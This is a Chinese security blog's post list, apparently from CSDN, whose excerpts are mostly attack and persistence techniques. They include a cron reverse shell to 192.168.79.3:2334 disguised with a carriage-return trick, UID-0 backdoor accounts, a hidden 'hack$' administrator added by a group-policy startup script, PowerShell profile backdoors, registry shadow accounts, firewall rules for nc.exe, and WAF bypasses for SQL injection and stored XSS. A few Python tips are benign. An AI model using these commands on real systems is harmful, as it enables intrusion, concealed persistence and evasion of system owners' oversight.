- 博客(15)
- 收藏
- 关注
原创 防火墙相关命令
查看防火墙配置netsh firewall show config允许指定程序全部连接(Windows Server 2003 系统及之前版本)netsh firewall add allowedprogram c:\nc.exe "allow nc" enable允许指定程序连入(Windows Server 2003 之后系统版本)netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="
2022-04-14 17:04:36 3112 1
原创 一行代码开启python、php简易服务
python# python2python2 -m SimpleHTTPServer 8080# python3python3 -m http.server 8080phpphp -S 127.0.0.1:8080
2022-04-14 16:56:52 765
原创 python脚本小技巧
交换变量值a, b = 5, 10a, b = b, a将列表中所有元素组合成字符串(以空格分隔)a = ["Python", "is", "awesome"]print(" ".join(a))查找列表中频率最高的值a = [1, 2, 3, 1, 2, 3, 2, 2, 4, 5, 1]print(max(set(a),key = a.count))检查两个字符串是不是由相同字母不同顺序组成from collections import CounterCounter(str1
2021-12-25 22:18:08 481
原创 PHP伪协议-文件包含
lfi.php<?php include $_GET['file'];?>php://input php://input 可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。注:当enctype="multipart/form-data",php://input 是无效的。
2021-12-24 22:39:54 2032
原创 隐藏计划任务反弹shell
靶机执行(crontab -l;printf "* * * * * /bin/bash -c '/bin/sh -i >& /dev/tcp/192.168.79.3/2334 0>&1';\r%100c\n")|crontab -vps监听nc -lvvp 2334 该计划任务是隐藏的,使用contab -e,选择一种编辑器后可以查看到内容...
2021-12-22 22:28:37 2203
原创 创建具有root权限的账户
第一种# guest:123456useradd -p `openssl passwd -1 -salt 'salt' 123456` guest -o -u 0 -g root -G root -s /bin/bash -d /home/test第二种# t0mcat:123456perl -le 'print crypt("123456","salt")' # 密码:123456echo "t0mcat:sahL5d5V.UWtI:0:0:/root:/bin/bash" >&
2021-12-21 22:51:19 581
原创 SQL注入绕过
空格字符绕过 %09 TAB建(水平) %0a 新建一行,换行 %0b TAB建(垂直) %0c 新的一页 %0d return 功能 %a0 空格 %00 /**/ /*!*/、/*!50009*/ # 受版本限制内联执行浮点数和科学计数法绕过某些WAFNULL值和 \N 绕过某些WAF引号绕过 如果过滤了单引号,可以使用双引号、反引号或者十六进制去重绕过过滤逗号join绕过like绕过
2021-12-20 22:51:34 242
原创 组策略脚本维持
在gpedit.msc上打开组策略,在Windows设置选项上有个脚本(启动/关机)选项 脚本参数可为空# shell.bat 放在开机自启动目录net user hack$ 123456 /add && net localgroup administrators hack$ /add
2021-12-19 22:39:14 2111
原创 PowerShell配置文件后门
PowerShell 配置文件是在 PowerShell 启动时运行的脚本。 在某些情况下,攻击者可以通过滥用PowerShell配置文件来获得持久性和提升特权。修改这些配置文件,以包括任意命令,功能,模块和/或PowerShell驱动器来获得持久性。案例echo $profile Test-path $profile # 结果返回false,表示没有该文件New-Item –Path $Profile –Type File –Force # 强制创建一个$string = 'S
2021-12-18 23:18:36 1181
原创 Windows隐藏文件
attrib命令隐藏文件夹或文件attrib +s +a +h +r testAttrib +s +a +h +r 1.php恢复隐藏的文件attrib d:\test -h -s /d /sattrib d:\"*" -h -s /d /s
2021-12-17 22:21:23 91
原创 创建影子账号
在账号后面加个美元符,可以隐藏账号;但仅仅只是在命令行无法查看到,在用户面板仍然可以看到该账号。解决办法进入注册表HEKY_LOCAL_MACHINE\SAM\SAM\Domains\Account\User编辑需要权限查看Administrator账号对应的文件复制该文件内容(右键全选-》复制)F文件粘贴替换掉需要隐藏账号的内容分别导出这两个文件导出后,删除该账号也可以使用命令行来删除ner user hacker$ /del删除后,双击刚刚导出的两个文件,导入到注册
2021-12-15 20:01:00 402
原创 远程终端问题集锦
1.描述 远程终端的默认端口是3389,云vps一般会开启,没有启用的情况下,在较高的权限下可以使用注册表命令进行开启。2.注册表开启远程终端命令2.1 2008 2012 2016 开启3389,写入到bat文件中echo DO ALL IN CMD!reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /vfDenyTSConnections /t REG_DWORD /d 0 /fre
2021-12-14 20:59:12 2488
原创 一不小心发现某站的存储型XSS
一不小心发现某站的存储型XSS 废话不多说,直接开干。经过测试,在个人资料板块,发现MSN处可以利用。 输入123,审计源码,分析HTML,尝试构造payload。闭合value属性" <scritp>alert(1)</script>// 发现有waf,直接被ban了。en……………… 尝试能否绕过看看。 输入成对的 ”<>“ 符号时,会被拦截,估计规则库匹配了成对的 ”<>“;这样子看的话,插入标签是不太好利用了。 换个思
2021-09-27 19:48:44 1293
原创 可控字符串长度受限情况下GetShell
可控字符串长度受限情况下GetShell思路分析利用案例EXP环境:命令执行只允许输入七个字符,尝试写入webshell思路分析 通过创建特殊的文件名(含有php代码),创建完后使用ls命令:ls>0 (把当前目录下所有的文件名写入到文件0中)。 shell命令太长,受长度限制,可以使用 “” 来分割,实现换行输入,最后写入到一个新的文件,然后执行:sh 0。文件0 执行后产生 1.php 就是写入的php马。注:要考虑写入的先后顺序问题,使用ls可以加上-t参数来排序(最新创建的在
2021-09-23 21:00:18 476
原创 PHP正则回溯溢出绕过
PHP正则绕过案例代码分析EXP案例代码<?php function is_php($data){ return preg_match('/<\?.*[(`;?>].*/is',$data); } if(empty($_FILES)) { die(show_source(__FILE__)) ; } $user_dir = './data/'; $data = file_get_contents($_FIL
2021-09-22 20:07:02 402
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人